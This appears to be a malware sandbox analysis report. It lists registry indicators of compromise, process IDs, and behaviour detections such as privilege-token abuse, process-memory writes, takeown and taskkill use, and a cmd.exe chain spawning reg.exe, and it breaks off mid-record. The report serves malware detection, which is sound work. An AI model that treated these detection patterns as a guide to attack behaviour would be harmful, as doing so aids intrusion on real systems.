description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Anywhere;Trailing" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "6;18;22" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Speech HW Voice Activation - German (Germany)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Speech SW Voice Activation - Spanish (Spain)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\sidubm.table" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15301#immutable1 = "Manage your RemoteApp and Desktop Connections" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings calc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Laura - Spanish (Spain)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\c1036.fe" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "L1040" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Haruka - Japanese (Japan)" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Katja" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Cosimo" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2123103809-19148277-2527443841-1000\{0BE3F587-2A25-41C6-A0E3-638D55350C2F} explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "436;41c;401;801;c01;1001;1401;1801;1c01;2001;2401;2801;2c01;3001;3401;3801;3c01;4001;42b;42c;82c;42d;423;402;455;403;c04;1004;1404;41a;405;406;465;413;813;809;c09;1009;1409;1809;1c09;2009;2409;2809;2c09;3009;3409;425;438;429;40b;80c;c0c;100c;140c;180c;456;437;807;c07;1007;1407;408;447;40d;439;40e;40f;421;410;810;44b;457;412;812;440;426;427;827;42f;43e;83e;44e;450;414;814;415;416;816;446;418;419;44f;c1a;81a;41b;424;80a;100a;140a;180a;1c0a;200a;240a;280a;2c0a;300a;340a;380a;3c0a;400a;440a;480a;4c0a;500a;430;441;41d;81d;45a;449;444;44a;41e;41f;422;420;820;443;843;42a;540a" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" certreq.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Ayumi - Japanese (Japan)" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_en-US.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Paul - French (France)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "L1041" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\tn1041.bin" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 certreq.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "L3082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\lsr1036.lxa" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings." explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 1e00718000000000000000000000c7ac07700232d111aad200805fc1270e0000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "Microsoft Hortense - French (France)" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\AudioInput\\TokenEnums\\MMAudioIn\\" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "404" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\sidubm.table" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\L1033" SearchApp.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 4056 reg.exe 2228 reg.exe 1268 reg.exe 1104 reg.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5052 explorer.exe 2828 explorer.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 7000 powershell.exe 7000 powershell.exe 7000 powershell.exe 3440 chinah.exe 3440 chinah.exe 5448 WMIC.exe 5448 WMIC.exe 5448 WMIC.exe 5448 WMIC.exe 4012 WMIC.exe 4012 WMIC.exe 4012 WMIC.exe 4012 WMIC.exe -
Suspicious behavior: GetForegroundWindowSpam 13 IoCs
pid Process 4052 mmc.exe 4956 mmc.exe 5296 explorer.exe 4164 mmc.exe 2036 cmd.exe 7900 explorer.exe 4060 explorer.exe 7872 explorer.exe 7740 explorer.exe 4196 explorer.exe 7080 mmc.exe 3096 explorer.exe 6216 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe 3864 msedge.exe -
Suspicious behavior: SetClipboardViewer 14 IoCs
pid Process 6104 mmc.exe 4496 mmc.exe 4352 mmc.exe 4956 mmc.exe 4164 mmc.exe 3996 mmc.exe 5804 mmc.exe 4012 mmc.exe 7128 mmc.exe 5160 mmc.exe 5740 mmc.exe 7080 mmc.exe 4308 mmc.exe 5836 mmc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5052 explorer.exe Token: SeCreatePagefilePrivilege 5052 explorer.exe Token: 33 4052 mmc.exe Token: SeIncBasePriorityPrivilege 4052 mmc.exe Token: 33 4052 mmc.exe Token: SeIncBasePriorityPrivilege 4052 mmc.exe Token: 33 6104 mmc.exe Token: SeIncBasePriorityPrivilege 6104 mmc.exe Token: 33 6104 mmc.exe Token: SeIncBasePriorityPrivilege 6104 mmc.exe Token: SeTakeOwnershipPrivilege 2320 takeown.exe Token: SeDebugPrivilege 1940 taskkill.exe Token: SeDebugPrivilege 2388 taskkill.exe Token: SeSecurityPrivilege 2604 TiWorker.exe Token: SeRestorePrivilege 2604 TiWorker.exe Token: SeBackupPrivilege 2604 TiWorker.exe Token: 33 4352 mmc.exe Token: SeIncBasePriorityPrivilege 4352 mmc.exe Token: 33 4352 mmc.exe Token: SeIncBasePriorityPrivilege 4352 mmc.exe Token: 33 4352 mmc.exe Token: SeIncBasePriorityPrivilege 4352 mmc.exe Token: 33 4352 mmc.exe Token: SeIncBasePriorityPrivilege 4352 mmc.exe Token: 33 4352 mmc.exe Token: SeIncBasePriorityPrivilege 4352 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4956 mmc.exe Token: SeIncBasePriorityPrivilege 4956 mmc.exe Token: 33 4496 mmc.exe Token: SeIncBasePriorityPrivilege 4496 mmc.exe Token: 33 4496 mmc.exe Token: SeIncBasePriorityPrivilege 4496 mmc.exe Token: SeBackupPrivilege 2604 TiWorker.exe Token: SeRestorePrivilege 2604 TiWorker.exe Token: SeSecurityPrivilege 2604 TiWorker.exe Token: SeBackupPrivilege 2604 TiWorker.exe Token: SeRestorePrivilege 2604 TiWorker.exe Token: SeSecurityPrivilege 2604 TiWorker.exe Token: SeBackupPrivilege 2604 TiWorker.exe Token: SeRestorePrivilege 2604 TiWorker.exe Token: SeSecurityPrivilege 2604 TiWorker.exe Token: SeBackupPrivilege 2604 TiWorker.exe Token: SeRestorePrivilege 2604 TiWorker.exe Token: SeSecurityPrivilege 2604 TiWorker.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5052 explorer.exe 4000 SndVol.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 2828 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4000 SndVol.exe 4000 SndVol.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 3784 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4292 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 4604 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe 5296 explorer.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4052 mmc.exe 4052 mmc.exe 6104 mmc.exe 6104 mmc.exe 3104 rundll32.exe 32 msconfig.exe 32 msconfig.exe 4496 mmc.exe 4496 mmc.exe 4956 mmc.exe 4352 mmc.exe 4956 mmc.exe 4352 mmc.exe 4496 mmc.exe 4496 mmc.exe 2128 rundll32.exe 4164 mmc.exe 4164 mmc.exe 3996 mmc.exe 3996 mmc.exe 5788 StartMenuExperienceHost.exe 4892 TextInputHost.exe 4892 TextInputHost.exe 1060 StartMenuExperienceHost.exe 4360 TextInputHost.exe 4360 TextInputHost.exe 3828 StartMenuExperienceHost.exe 5788 TextInputHost.exe 5788 TextInputHost.exe 5804 mmc.exe 5804 mmc.exe 1832 DisplaySwitch.exe 6308 StartMenuExperienceHost.exe 5428 SearchApp.exe 5296 explorer.exe 5296 explorer.exe 4012 mmc.exe 4012 mmc.exe 7128 mmc.exe 7128 mmc.exe 5160 mmc.exe 5160 mmc.exe 5740 mmc.exe 5740 mmc.exe 7080 mmc.exe 7080 mmc.exe 4308 mmc.exe 4308 mmc.exe 3440 chinah.exe 5836 mmc.exe 5836 mmc.exe 4304 certreq.exe 5848 AgreementViewer.exe 6732 TextInputHost.exe 6732 TextInputHost.exe 7584 StartMenuExperienceHost.exe 7756 SearchApp.exe 3904 TextInputHost.exe 3904 TextInputHost.exe 4784 StartMenuExperienceHost.exe 1064 SearchApp.exe 1776 TextInputHost.exe 1776 TextInputHost.exe 7244 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2036 2080 chrome.exe 86 PID 2080 wrote to memory of 2036 2080 chrome.exe 86 PID 2036 wrote to memory of 5456 2036 cmd.exe 90 PID 2036 wrote to memory of 5456 2036 cmd.exe 90 PID 2036 wrote to memory of 3584 2036 cmd.exe 91 PID 2036 wrote to memory of 3584 2036 cmd.exe 91 PID 2036 wrote to memory of 4056 2036 cmd.exe 92 PID 2036 wrote to memory of 4056 2036 cmd.exe 92 PID 2036 wrote to memory of 2228 2036 cmd.exe 93 PID 2036 wrote to memory of 2228 2036 cmd.exe 93 PID 2036 wrote to memory of 1268 2036 cmd.exe 94 PID 2036 wrote to memory of 1268 2036 cmd.exe 94 PID 2036 wrote to memory of 1104 2036 cmd.exe 95 PID 2036 wrote to memory of 1104 2036 cmd.exe 95 PID 2036 wrote to memory of 4808 2036 cmd.exe 96 PID 2036 wrote to memory of 4808 2036 cmd.exe 96 PID 2036 wrote to memory of 4780 2036 cmd.exe 97 PID 2036 wrote to memory of 4780 